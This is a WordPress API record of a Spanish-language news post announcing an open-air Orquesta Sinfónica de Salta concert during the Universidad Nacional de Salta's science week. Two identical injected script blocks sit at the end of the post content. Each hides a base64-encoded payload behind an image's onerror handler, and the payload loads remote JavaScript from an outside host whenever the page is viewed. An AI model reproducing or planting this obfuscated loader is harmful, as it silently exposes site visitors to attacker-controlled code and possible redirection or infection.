{"id":1547,"date":"2022-09-26T13:10:56","date_gmt":"2022-09-26T16:10:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1547"},"modified":"2025-08-14T00:34:27","modified_gmt":"2025-08-14T03:34:27","slug":"la-orquesta-sinfonica-de-salta-regresa-a-la-plaza-9-de-julio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1547","title":{"rendered":"La Orquesta Sinf\u00f3nica de Salta regresa a la Plaza 9 de Julio"},"content":{"rendered":"\n<h3 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#893147\"><em>Con un concierto al aire libre, la agrupaci\u00f3n orquestal participar\u00e1 de los festejos por los 50 a\u00f1os de la Universidad Nacional de Salta.<\/em><\/h3>\n\n\n\n<p>En el marco de la Semana Nacional de la Ciencia, la Tecnolog\u00eda y la Cultura, organizada por la Universidad Nacional de Salta, la&nbsp;<strong>Orquesta Sinf\u00f3nica de Salta<\/strong>&nbsp;se presentar\u00e1 en concierto el jueves 29 de septiembre a las 21 horas en la explanada del Cabildo Hist\u00f3rico (Caseros 549).<\/p>\n\n\n\n<p>Bajo la direcci\u00f3n de Mart\u00edn &nbsp;D\u2019 El\u00eda, se ofrecer\u00e1 un concierto de variado repertorio integrado por obras de Gioachino Rossini, Ger\u00f3nimo Gim\u00e9nez, Georges Bizet, Johann Strauss, Edvard Grieg, Arturo M\u00e1rquez, Cuchi Leguizam\u00f3n, The Beatles y Astor Piazzolla.<\/p>\n\n\n\n<p>Hace 8 a\u00f1os la Sinf\u00f3nica ofreci\u00f3 un \u00faltimo concierto al aire libre en la plaza principal de nuestra ciudad, en ese entonces brind\u00f3 un concierto homenaje al Rock Nacional con artistas invitados. Esta vuelta al aire libre, tambi\u00e9n es motivo de celebraci\u00f3n luego de dos a\u00f1os de pandemia por el COVID 19, ya que se encontraba restringida la organizaci\u00f3n de eventos masivos.<\/p>\n\n\n\n<p>Cabe destacar que, en caso de lluvia se traslada al Teatro Provincial \u00abJuan Carlos Saravia\u00bb (Zuvir\u00eda 70).<\/p>\n\n\n\n<p><strong>Sobre la Semana Nacional de la Ciencia, la Tecnolog\u00eda y la Cultura<\/strong><\/p>\n\n\n\n<p>Es una actividad que se desarrolla anualmente con los objetivos de fomentar la participaci\u00f3n, estimular las vocaciones cient\u00edficas, exhibir y compartir el trabajo que realizan los investigadores, docentes, becarios y estudiantes de los Centros Cient\u00edficos Tecnol\u00f3gicos, Ministerios, y Universidad. Este a\u00f1o, se realiza en el marco del 50\u00b0 Aniversario de la Universidad Nacional de Salta.<\/p>\n\n\n\n<p>Tendr\u00e1 lugar desde el 26 al 28 de septiembre (9 a 13 hs. \u2013 15 a 21 hs.), con la presencia de 70 stands, m\u00e1s de 60 charlas, talleres y conferencias, 2 jornadas, 5 exposiciones, y 4 actos principales, una feria editorial y la presentaci\u00f3n de libros. Todas las actividades propuestas se nuclear\u00e1n en la Plaza 9 de Julio y alrededores. Participan de la organizaci\u00f3n m\u00e1s de 500 investigadores, docentes, artistas, estudiantes y becarios del pa\u00eds.<\/p>\n\n\n\n<p>Puede conocer todas las propuestas en https:\/\/semanacientifica.unsa.edu.ar\/<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-orquesta-sinfonica-de-salta-regresa-a-la-plaza-9-de-julio-85063\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con un concierto al aire libre, la agrupaci\u00f3n orquestal participar\u00e1 de los festejos por los 50 a\u00f1os de la Universidad Nacional de Salta. En el marco de la Semana Nacional de la Ciencia, la Tecnolog\u00eda y la Cultura, organizada por la Universidad Nacional de Salta, la&nbsp;Orquesta Sinf\u00f3nica de Salta&nbsp;se presentar\u00e1 en concierto el jueves 29 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1548,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-1547","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1547"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1547"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1547\/revisions"}],"predecessor-version":[{"id":7336,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1547\/revisions\/7336"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1548"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}